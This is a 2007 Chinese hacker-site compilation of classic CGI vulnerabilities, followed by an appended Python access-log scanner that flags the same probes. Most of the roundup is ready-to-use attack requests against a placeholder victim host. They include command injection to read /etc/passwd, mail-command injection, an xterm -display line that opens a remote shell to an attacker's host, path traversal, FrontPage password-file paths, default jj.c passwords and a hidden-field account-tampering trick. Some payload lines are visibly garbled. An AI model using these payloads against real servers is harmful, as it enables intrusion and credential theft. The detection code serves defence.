
Classic CGI Vulnerability Roundup

Compiled and published by: 黑客风云  Source: www.05112.com  Updated: 2007-6-18 10:36:53

11. campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan\@pop3.kappa.roparagraph

13. websendmail
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a

14. handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download
Note: the character after cat is a TAB, not a space. The server will report that it cannot open useless_shit, but it still executes the command that follows.

15. test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
This reveals some of the server's HTTP directories and environment.
lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
This trick does not seem to work. :(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
You can also try it this way:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

16. On some BSD Apache installations you can:
lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

17. htmlscript
lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

18. jj.c
The demo cgi program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program, running strings on it
will probably reveal the password.
Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.

19. FrontPage extensions
If you read http://www.victim.com/_vti_inf.html you will get the version of the FP extensions
and their path on the server. There are also password files such as:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

20. Freestats.com CGI
I have never run into this one, and some details must not be gotten wrong, so I am pasting the English directly.
John Carlton found the following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. There will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple JavaScript function.
Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
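As a defensive complement to the probes listed in sections 11 through 19, here is an added example (not part of the original article) that scans Common Log Format access-log lines, URL-decodes each request target, and flags the campas, handler, test-cgi/nph-test-cgi, htmlscript, webgais/websendmail, FrontPage _vti_pvt and ~root patterns described above. The rule names, sample log lines and IP addresses are constructed for this example.

```python
import re
from urllib.parse import unquote

# Signatures for the classic CGI probes on this page, matched on the URL-decoded
# request target. Constructed for this example; tune to your environment.
CGI_PROBE_RULES = [
    ("campas newline injection", re.compile(r"/cgi-bin/campas\?.*\n", re.S)),
    ("handler shell metachar", re.compile(r"/cgi-bin/handler/[^?]*[;|]")),
    ("test-cgi probe", re.compile(r"/cgi-bin/(nph-)?test-cgi(\?|$)")),
    ("htmlscript traversal", re.compile(r"/cgi-bin/htmlscript\?.*\.\./")),
    ("legacy mail cgi", re.compile(r"/cgi-bin/(webgais|websendmail)\b")),
    ("frontpage pwd/info file", re.compile(r"/_vti_(pvt/\w+\.pwd|inf\.html)")),
    ("root docroot escape", re.compile(r"^/(~root|root)/etc/")),
    ("etc/passwd in request", re.compile(r"/etc/passwd")),
]

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(target):
    """Return the names of every rule the decoded request target trips."""
    decoded = unquote(unquote(target))  # double-decode so %250a also becomes a newline
    return [name for name, rx in CGI_PROBE_RULES if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client_ip, method, target, status, [rule names]) per suspicious line."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip
        ip, method, target, status = m.groups()
        rules = classify(target)
        if rules:
            hits.append((ip, method, target, int(status), rules))
    return hits

# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jun/2007:10:36:53 +0800] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 200 1234',
    '203.0.113.5 - - [18/Jun/2007:10:37:01 +0800] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 512',
    '203.0.113.7 - - [18/Jun/2007:10:38:10 +0800] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 210',
    '198.51.100.2 - - [18/Jun/2007:10:39:00 +0800] "GET /index.html HTTP/1.0" 200 3000',
    '203.0.113.9 - - [18/Jun/2007:10:40:15 +0800] "GET /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for ip, method, target, status, rules in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {status}: {', '.join(rules)}")
```

A 404 on a _vti_pvt password file is still worth an alert: the probe itself shows reconnaissance for these scripts, and a 200 on any of them means the legacy CGI is present and should be removed.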


Entered by: cainiaowang    Editor: cainiaowang